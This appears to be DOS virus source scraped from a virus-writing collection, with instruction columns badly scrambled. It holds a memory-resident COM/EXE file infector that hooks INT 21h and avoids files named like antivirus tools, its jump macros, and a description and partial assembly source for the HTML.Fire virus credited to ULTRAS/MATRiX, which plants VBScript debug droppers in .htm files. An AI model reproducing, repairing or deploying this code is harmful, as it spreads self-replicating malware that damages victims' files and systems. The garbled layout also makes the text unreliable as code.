> push_all ah, 3ch infect_floppy ah, 3dh infect_floppy ah, 3eh infect_close ah, 4bh call_int21 infect_and_call_int21
BLOCK
infect_and_call_int21 CALLL infect JUMP call_int21
BLOCK
call_int21 CALLL pop_all jmp dword ptr cs:[1234h] old21
I< RELO BLOCK I< I< I< I< I<
infect_floppy mov si, dx lodsb cmp byte ptr ds:[si], ':' _JNZ no_drive_pressed or al, 20h cmp al, 'b' _JA call_int21 JUMP infect_in_close
BLOCK I< I< I< I< I<
no_drive_pressed push ax mov ah, 19h int 21h cmp al, 1 pop ax _JA call_int21 JUMP infect_in_close
BLOCK I<
infect_in_close cmp ah, 3ch _JNZ infect_and_call_int21 xor bx, bx CALLL check4handle _JNZ call_int21 CALLL init_int24 mov ah, 60h dec si push cs pop es mov di, 1234h path int 21h _JC no_inf_int24 CALLL pop_all pushf call dword ptr cs:[1234h] old21
I<
I< I< I< I< I< RELO I< ; I< I< RELO
> > > >
>
> > > > >
> > > > >
> >
> > > > > >
> >
TSR.INC
I< I< I< I< I< RELO I< I< I< BLOCK
I< I< RELO I< I< RELO I< I< I< I< RELO I< I< I<
CALLL pushf mov adc and mov handle CALLL popf CALLL sti retf
push_all bx, 0FFFFh bx, 0 ax, bx cs:[1234h], ax
> > > > >
deinit_int24 > pop_all 2
infect_close CALLL check4handle _JC call_int21 xor ax, ax mov cs:[1234h], ax handle CALLL pop_all pushf call dword ptr cs:[1234h] old21 CALLL push_all pushf push cs pop ds mov dx, 1234h path CALLL infect popf CALLL pop_all sti retf 2
> >
> >
> >
> > > >
> > >
; BX - handle ; if CF=1 iny handle alebo ine PSP ; if ZF=1 ine PSP alebo BX=HANDLE BLOCK check4handle I< push bx I< mov ah, 62h I< int 21h I< mov di, 1234h RELO psp I< cmp cs:[di], bx I< mov cs:[di], bx I< mov di, 1234h RELO handle _JNZ new_psp I< pop bx I< mov ax, bx I< sub ax, word ptr cs:[di] I< add ax, 0FFFFh I< inc ax I< ret
> > > > > >
BLOCK I< I< I< I< I<
> > > > >
new_psp mov word ptr cs:[di], 0 xor ax, ax pop bx stc ret
> > > > > > >
TSR.INC
BLOCK I< I< I< I< I< I< I< I< I< I< ifdef I< endif I< I< ifdef I< endif I<
BLOCK I< I< I< I<
BLOCK I< I< I< I< I< I< I<
infect push ds pop es mov di, dx mov cx, 67d xor al, al repne scasb _JNZ no_inf lea si, [di - 5] lodsw or ax, 2020h mov bx, 'mo' INFECT_ONLY_CMM_EXX mov bx, 'mm'
cmp _JZ JUMP
ax, 'e.' file_ok no_inf
>
file_ok lodsw or cmp _JNZ sub JUMP
ax, 2020h ax, bx no_inf si, 4 prepare_str
prepare_str dec si mov al, [si] cmp al, '/' _JZ str_start cmp al, '\' _JZ str_start cmp al, ':' _JZ str_start cmp si, dx _JA prepare_str dec si JUMP str_start
I<
cmp _JZ cmp _JZ cmp _JZ cmp _JZ
I<
> >
str_start inc si lodsw or ax, 2020h xor ax, 0AA55h
I<
> > > >
cmp ax, 'c.' _JZ file_ok mov bx, 'ex' INFECT_ONLY_CMM_EXX mov bx, 'xx'
BLOCK I< I< I< I<
I<
> > > > > >
ax, ('ci' no_inf ax, ('on' no_inf ax, ('ew' no_inf ax, ('bt' no_inf
> >
> > > >
> > > > > > >
> > >
xor 0AA55h)
>
xor 0AA55h)
>
xor 0AA55h)
>
xor 0AA55h)
>
TSR.INC
I<
xor 0AA55h)
>
xor 0AA55h)
>
xor 0AA55h)
>
xor 0AA55h)
>
cmp _JZ cmp _JZ cmp _JZ
ax, ('oc' xor 0AA55h) no_inf ax, ('iw' xor 0AA55h) no_inf ax, ('rk' xor 0AA55h) no_inf
>
CALLL
init_int24
mov pushf call old21 _JC
ax, 3d02h dword ptr cs:[1234h]
I<
mov
bx, ax
>
I< I< I<
xor mov mov
ax, ax ds, ax si, ds:[46Dh]
> > >
I< I< I< I<
push push pop pop
cs cs ds es
> > > >
I< I<
mov int _JC
ax, 05700h 21h close
> >
I< RELO I< I< I<
mov date mov and cmp _JZ
ds:[1234h], dx
>
al, cl al, 00011111b al, 4 close
> > >
I< I< I< RELO
and or mov time
cl, 11100000b cl, 4 ds:[1234h], cx
> > >
I< I< RELO
si, 0FFF0h ds:[1234h], si
> >
I< RELO
and cmp ticks _JZ mov ticks
close ds:[1234h], si
>
I< I< I< RELO
mov ah, 3fh mov cx, 18h mov dx, 1234h exe_header
I< I< I<
I< I< I<
I< I< I< RELO
cmp _JZ cmp _JZ cmp _JZ cmp _JZ
ax, ('va' no_inf ax, ('-f' no_inf ax, ('cs' no_inf ax, ('lc' no_inf
> >
> > >
no_inf_int24
> > >
TSR.INC
I< I<
mov int _JC
si, dx 21h close
> >
I< I< I< I<
mov cwd xor int
ax, 4202h cx, cx 21h
> > > >
I<
mov
word ptr ds:[0], 02e8dh
>
I<
cmp _JZ cmp _JZ
word ptr ds:[si], 'ZM' exe_infect word ptr ds:[si], 'MZ' exe_infect
>
I<
>
I< RELO
mov byte ptr ds:[1234h], cl filetype
>
I<
cmp _JB
ax, 3000d close
I<
cmp _JA
ax, 57000d close
I< I< RELO I< I< I< I< RELO I< RELO I< I< RELO I< I< I<
push si mov di, 1234h exe_header mov cl, ds:[di] mov byte ptr ds:[di], 0E9h inc di mov ds:[1234h], cl old_inst mov ds:[1234h], cl _old_inst mov cx, ds:[di] mov si, 1234h old_inst mov ds:[si + 1], cx sub ax, 3 stosw
> >
I< I< RELO
mov cmp @JMPS _JA mov CALLL sub add JUMP
> >
; min 3kb
> ; max 57kb
I< I< I<
BLOCK I< RELO I< I< I< I< RELO I< RELO
ax, BAD_CLEAN word ptr ds:[1234h], ax no_com_ojeb bp, 16 @rnd_max ax, 8 cx, ax no_com_ojeb
no_com_ojeb mov si, 1234h _old_inst mov ds:[si + 1], cx pop si mov ax, -10h mov ds:[1234h], ax old_cs mov ds:[1234h], ax old_ss
COM file
COM file >
> > > > > > > > > >
> > >
> > > > > >
TSR.INC
I< I< RELO I< RELO I< I< RELO I< I< RELO I< I< RELO
mov ax, 100h mov ds:[1234h], old_ip mov ds:[1234h], _old_ip mov ax, 0FFFEh mov ds:[1234h], old_sp inc ax mov ds:[1234h], old_max_mem mov ax, 1000h mov ds:[1234h], min_mem
ax
> >
ax
>
ax
> >
ax
> >
ax
> >
I< I< I< I<
mov cwd xor int
cx, cx 21h
I<
add JUMP
ax, 100h set_marker
BLOCK I< I< I< I< RELO I<
set_marker mov ds:[2], ax mov ah, 40h cwd mov cx, 1234h in_mem int 21h _JC close
I< I< I< I<
mov cwd xor int
cx, cx 21h
I< I< I< I<
mov mov mov int _JC
ah, 40h dx, si cx, 18h 21h close
> > > >
I< I< RELO I< RELO I<
mov mov time mov date int JUMP
ax, 5701h cx, ds:[1234h]
> >
dx, ds:[1234h]
>
21h close
>
BLOCK I< I<
close mov int JUMP
ah, 3eh 21h no_inf_int24
> >
BLOCK
no_inf_int24 CALLL deinit_int24 JUMP no_inf
BLOCK I<
no_inf ret
ax, 4202h
ax, 4200h
> > > > >
> > > > >
> > > >
>
TSR.INC
BLOCK I< I< RELO
exe_infect inc cx mov byte ptr ds:[1234h], cl filetype
I<
or _JNZ cmp _JB JUMP
> >
; min 10kb
I<
EXE file
dx, dx no_short_exe ax, 10000d close no_short_exe
> >
; max 400kb EXE file BLOCK I<
no_short_exe cmp dx, 400 / 66 _JA close
I< I< I< I< I< I< I< I<
push push mov div inc cmp pop pop _JNZ
ax dx cx, 200h cx ax [si + 04h], ax dx ax close
> > > > > > > >
I< I< I< I<
push push xor cmp _JZ
ax dx ax, ax word ptr ds:[si + 0ch], 0FFFFh max_mem_FFFF
> > > >
I< I< I< I< I<
mov inc mov shl sub JUMP
ax, [si + 4] ax cl, 5 ax, cl ax, [si + 8] max_mem_FFFF
> > > > >
BLOCK I< I< RELO I< I< RELO I< I< RELO I< I< RELO I< RELO I< I< RELO
max_mem_FFFF add ax, [si + 0ch] mov ds:[1234h], ax old_max_mem mov ax, [si + 0eh] mov ds:[1234h], ax old_ss mov ax, [si + 10h] mov ds:[1234h], ax old_sp mov ax, [si + 14h] mov ds:[1234h], ax old_ip mov ds:[1234h], ax _old_ip mov ax, [si + 16h] mov ds:[1234h], ax old_cs
I< I< I<
pop pop push
dx ax ax
>
> > > > > > > > > > >
> > >
TSR.INC
I<
push
dx
>
I< I< I< I< I< I< I< I< I<
mov mov mov mov div sub inc mov mov
word ptr [si + 0ch], 0FFFFh word ptr [si + 10h], 07ffeh word ptr [si + 14h], 0 cx, 10h cx ax, [si + 8] ax [si + 0eh], ax [si + 16h], ax
> > > > > > > > >
I< I< I< I< I< I< I<
mov inc mov shl sub add mov
ax, ax cl, ax, ax, ax, di,
> > > > > > >
I< I< I< I< I< I< I< I< RELO I<
pop pop and add adc mov int add in_mem adc
cx dx dx, dx, cx, ax, 21h ax,
dx, 0
>
I< I< I< I< I< I< I<
mov div mov add adc mov mov
cx, cx [si dx, ax, [si [si
> > > > > > >
I< I< I< I< I< I< RELO
inc mov shl sub add mov min_mem
ax cl, 5 ax, cl ax, [si + 8] ax, [si + 0ah] word ptr ds:[1234h], ax
> > > > > >
I<
sub _JBE add JUMP
di, ax write_exeh [si + 0ah], di write_exeh
>
I<
BLOCK I< I< RELO I< I< I< I<
[si + 04h] 5 cl [si + 8] [si + 0ah] ax
not 0fh 10h 0 4200h 1234h
200h + 02h], dx 0FFFFh 0 + 04h], ax + 0ah], 800h
write_exeh mov ax, BAD_CLEAN cmp word ptr ds:[1234h], ax @JMPS mov ax, 0 _JA set_marker mov bp, 16 CALLL @rnd_max sub al, 8 mov di, 1234h
> > > > > > > >
>
> > > > > >
TSR.INC
RELO I< I< I<
_old_ip add mov mov JUMP
BLOCK I< I<
int24 mov iret
BLOCK I< I< I< I< I< I< I< I< RELO I< RELO I< RELO I< I< I< I< I< I<
init_int24 push dx push ds push es push cs pop ds mov ax, 3524h int 21h mov ds:[1234h], es int24_seg mov ds:[1234h], bx int24_ofs mov dx, 1234h int24 mov ax, 2524h int 21h pop es pop ds pop dx ret
BLOCK I< I< RELO I< RELO I< I< I< I<
deinit_int24 push ds mov dx, cs:[1234h] int24_ofs mov ds, cs:[1234h] int24_seg mov ax, 2524h int 21h pop ds ret
BLOCK I< RELO I< I< I< I< I< I< I< I< I< I< RELO
push_all pop word ptr cs:[1234h] exit_adr push ax push bx push cx push dx push si push di push bp push ds push es jmp word ptr cs:[1234h] exit_adr
BLOCK I< RELO I< I<
pop_all pop word ptr cs:[1234h] exit_adr pop es pop ds
ds:[di + 1], al word ptr ds:[0], 0ed33h ax, 09090h set_marker
> > >
al, 3
> >
> > > > > > > > > > > > > > > >
> > > > > > >
> > > > > > > > > >
> > >
TSR.INC
I< I< I< I< I< I< I< I< RELO
pop bp pop di pop si pop dx pop cx pop bx pop ax jmp word ptr cs:[1234h] exit_adr
BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D< BLOCK D<
old21 dd 0 int24_seg dw 0 int24_ofs dw 0 exit_adr dw 0 exe_header db 18h dup(0) ticks dw 0 time dw 0 date dw 0 psp dw 0 handle dw 0 path db 7 dup(0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0ah)
> > > > > > >
> > > > > > > > > > >
MACROS.INC
MAX_CODE_SIZE
EQU
M_END M_CODE M_CALL M_JMP M_RELO M_BLOCK M_STOP
0 0E8h 0E8h 0E9h 0EDh 0EEh 0EFh
EQU EQU EQU EQU EQU EQU EQU
START_JUMP
EQU
M_J_COND EQU M_JO EQU M_JNO EQU M_JC EQU M_JB EQU M_JNAE EQU M_JNB EQU M_JAE EQU M_JZ EQU M_JE EQU M_JNZ EQU M_JNE EQU M_JBE EQU M_JNA EQU M_JNBE EQU M_JA EQU
0F0h 0F0h 0F1h 0F2h 0F2h 0F2h 0F3h 0F3h 0F4h 0F4h 0F5h 0F5h 0F6h 0F6h 0F7h 0F7h
M_JS M_JNS M_JP M_JPE M_JNP M_JPO M_JL M_JNGE M_JNL M_JGE M_JLE M_JNG M_JNLE M_JG
EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU
0F8h 0F9h 0FAh 0FAh 0FBh 0FBh 0FCh 0FCh 0FDh 0FDh 0FEh 0FEh 0FFh 0FFh
_JO
macro db dw endm
num M_JO num
_JNO
macro db dw endm
num M_JNO num
_JC
macro db dw endm
num M_JC num
_JB
macro db dw
num M_JB num
10h
;start of code
0F0h
MACROS.INC
endm _JNAE
macro db dw endm
num M_JNAE num
_JNB
macro db dw endm
num M_JNB num
_JAE
macro db dw endm
num M_JAE num
_JZ
macro db dw endm
num M_JZ num
_JE
macro db dw endm
num M_JE num
_JNZ
macro db dw endm
num M_JNZ num
_JNE
macro db dw endm
num M_JNE num
_JBE
macro db dw endm
num M_JBE num
_JNA
macro db dw endm
num M_JNA num
_JNBE
macro db dw endm
num M_JNBE num
_JA
macro db dw endm
num M_JA num
_JS
macro db dw endm
num M_JS num
MACROS.INC
_JNS
macro db dw endm
num M_JNS num
_JP
macro db dw endm
num M_JP num
_JPE
macro db dw endm
num M_JPE num
_JNP
macro db dw endm
num M_JNP num
_JPO
macro db dw endm
num M_JPO num
_JL
macro db dw endm
num M_JL num
_JNGE
macro db dw endm
num M_JNGE num
_JNL
macro db dw endm
num M_JNL num
_JGE
macro db dw endm
num M_JGE num
_JLE
macro db dw endm
num M_JLE num
_JNG
macro db dw endm
num M_JNG num
_JNLE
macro db dw endm
num M_JNLE num
_JG
macro db
num M_JG
MACROS.INC
dw endm
num
CALLL
macro db dw endm
num M_CALL num
JUMP
macro db dw endm
num M_JMP num
RELO
macro db dw endm
num M_RELO num
BLOCK
macro db dw endm
num M_STOP, M_BLOCK num
I
macro local db inst end_inst: endm
inst end_inst end_inst - $ - 1
D
inst end_inst end_inst - $ - 1 + MAX_CODE_SIZE
macro local db inst end_inst: endm
HTML.Fire is first in the world HTML/DOS hybrid. The virus infects all htm files in current directory. It uses VBScript in HTML (given version works under Internet Explorer 4.0 and above) to convert itself back to DOS executable by running debug with hex-dump script in shell. In fact it is a direct action html-infector, that finds .htm files on local disc beeing runned, and places there a VBScript with hexdump to reborn this dropper again. Download source code of HTML.Fire here
HTML.Fire.asm
comment * HTML.FIRE BY ULTRAS/MATRiX ~~~~~~~~~~~~~~~~~~~~~~~~~~ First in the world HTML/DOS hybrid. The virus infects all htm files in current The catalogue writes down at the end of a file debug script. The given version Works under Internet Explorer 4.0 and above. * model tiny code org 100 start: mov ah,4e mov dx,offset htm_ find: int 21 jc exit mov ax,3d02 mov dx,9e int 21 jc findnext xchg bx,ax mov ax,5700 int 21 push cx dx cmp dh,80 jae zaraza mov ax,4202 xor cx,cx xor dx,dx int 21 mov si,100 mov di,offset end_virus mov cx,end_virus-start push bx call @1 pop bx call infect pop dx add dh,0c8 push dx zaraza: pop dx cx mov ax,5701 int 21 mov ah,3e int 21 findnext: mov ah,4f jmp find exit: mov ax,4c00 int 21 @1: push cx lodsb mov bx,ax mov cx,4 shr al,cl
HTML.Fire.asm
push ax call @2 stosb pop ax shl al,cl sub bl,al xchg al,bl call @2 stosb mov ax,' ' stosb pop cx loop @1 stosb stosb ret @2: cmp al,0a jae @3 add al,'0' ret @3: add al,'A'-0a ret infect: mov ah,40 mov dx,offset headerinf mov cx,hendinf-headerinf int 21 mov dx,offset end_virus d_loop: push dx call calcloc call write_par pop dx push dx mov cx,di sub cx,dx cmp cx,60d jb write_d mov cx,60d write_d: mov ah,40 int 21 push ax mov dx,offset echodest mov cx,evirusf-echodest mov ah,40 int 21 pop ax pop dx add dx,ax cmp dx,di jae write_zap jmp d_loop write_zap: mov ah,40 mov dx,offset zap_vir mov cx,end_zap-zap_vir int 21 mov dx,offset endinf mov cx,end_endinf-endinf
HTML.Fire.asm
mov ah,40 int 21 ret virii db 'FiRe by ULTRAS' write_par: mov cx,enddb-databyte jmp short ech_o mov cx,5 ech_o: mov dx,offset databyte mov ah,40 int 21 ret calcloc: push ax bx cx dx si di sub dx,offset end_virus mov ax,dx mov cx,3 xor dx,dx div cx mov dx,ax add dx,100 mov di,offset hifr mov si,offset loc_ xchg dh,dl mov loc_,dx mov cx,2 call @1 mov di,offset buffer mov si,offset hifr movsw lodsb movsw pop di si dx cx bx ax ret htm_ db '*.htm',0 zap_vir: db 's.WriteLine "ECHO g >>fire.scr"',0dh,0a db 's.WriteLine "ECHO q >>fire.scr"',0dh,0a end_zap: databyte db 's.WriteLine "ECHO E' buffer db '0100 ' enddb: echodest db ' >>' virscr db 'fire.scr"',0dh,0a evirusf: endinf: db 's.WriteLine "debug
',0dh,0a end_endinf: headerinf: db 0dh,0a,'<script Language="VBScript">